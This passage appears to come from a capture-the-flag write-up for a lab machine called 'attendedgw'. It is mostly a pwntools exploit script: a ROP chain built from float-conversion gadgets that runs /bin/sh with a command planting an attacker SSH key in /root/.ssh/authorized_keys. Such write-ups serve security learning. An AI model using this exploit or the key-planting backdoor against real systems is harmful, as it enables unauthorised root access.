# /bin/sh args
arg1 = b'-c'.ljust(8, b'\x00') # -c
arg2 = b'mkdir /root/.ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBleIY99tS9NgpR7d8bXCTKeyLqPU56qLH7Cc89uqEUi" > /root/.ssh/authorized_keys'.ljust(136, b'\x00')
print(len(arg2))
โ€‹
# /bin/sh arg addresses
arg0_addr = p64(0x6010d0)
arg1_addr = p64(0x6010e0)
arg2_addr = p64(0x6010e8)
โ€‹
# Payload
payload = b'A'
payload += bin_sh
payload += bin_sh_addr_float
payload += arg1
payload += arg2
payload += arg0_addr
payload += arg1_addr
payload += arg2_addr
payload += zero
payload += junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += pop_rdx
payload += bin_sh_addr_float_addr
payload += movss_xmm0_dword_ptr_rdx
payload += cvtss2si_esi_xmm0
payload += mov_rdi_rsi
โ€‹
print(payload.hex())
โ€Œ
And here is how the addresses looks the array in the data section:
0x601170: 0x00000000006010d0 0x00000000006010e0
0x601180: 0x00000000006010e8 0x0000000000000000
โ€Œ
Now we need to make rsi point to the first adddress of the array so we do the same processes we did to rdi using cvtss2si and movss to make write 0x601170 to rsi.
0x601190: 0x000000004ac022e0 0x4141414141414141
โ€Œ
You know the drill, write the float to memory, then pop rdx with the address of that value and use our special gadgets to convert it back to hex and store it in rsi. Ps: I had to reset the rip before that because the rdx value was being writen to rip.โ€Œ That asa easy to solve, since I was already writing to rip i just had to write the correct address back to it to reajust the execution flow.

Syscall

With the following code we have all of our registers on their marks and can finally call a syscall. If we use it to authenticate to [email protected] our exploit works!:
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
junk = 560*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
bin_sh = b'/bin/sh\x00'
bin_sh_addr_float = p64(0x4ac021a0)
bin_sh_addr_float_addr = p64(0x6010d8)
bin_sh_addr_float_addr_addr = p64(0x6010e0)
pop_rdx = p64(0x000000000040036a)
movss_xmm0_dword_ptr_rdx = p64(0x000000000040037b)
cvtss2si_esi_xmm0 = p64(0x0000000000400380)
mov_rdi_rsi = p64(0x0000000000400367)
zero = p64(0x0)
bin_sh_args_float = p64(0x4ac022e0)
bin_sh_args_float_addr = p64(0x601190)
reset_rip = p64(0x40037b)
syscall = p64(0x00000000004003cf)
โ€‹
# /bin/sh args
arg1 = b'-c'.ljust(8, b'\x00') # -c
arg2 = b'mkdir /root/.ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBleIY99tS9NgpR7d8bXCTKeyLqPU56qLH7Cc89uqEUi" > /root/.ssh/authorized_keys'.ljust(136, b'\x00')
โ€‹
# /bin/sh arg addresses
arg0_addr = p64(0x6010d0)
arg1_addr = p64(0x6010e0)
arg2_addr = p64(0x6010e8)
โ€‹
# Payload
payload = b'A'
payload += bin_sh
payload += bin_sh_addr_float
payload += arg1
payload += arg2
payload += arg0_addr
payload += arg1_addr
payload += arg2_addr
payload += zero
payload += bin_sh_args_float
payload += junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += pop_rdx
payload += bin_sh_addr_float_addr
payload += movss_xmm0_dword_ptr_rdx
payload += cvtss2si_esi_xmm0
payload += mov_rdi_rsi
payload += pop_rdx
payload += reset_rip
payload += pop_rdx
payload += bin_sh_args_float_addr
payload += movss_xmm0_dword_ptr_rdx
payload += cvtss2si_esi_xmm0
payload += pop_rdx
payload += zero
payload += syscall
payload += zero
โ€‹
# Fin
print('[+]Hex payload:\n' + payload.hex())
โ€Œ
We can generate the payload.โ€Œ
And login to attendedgw.
โ€‹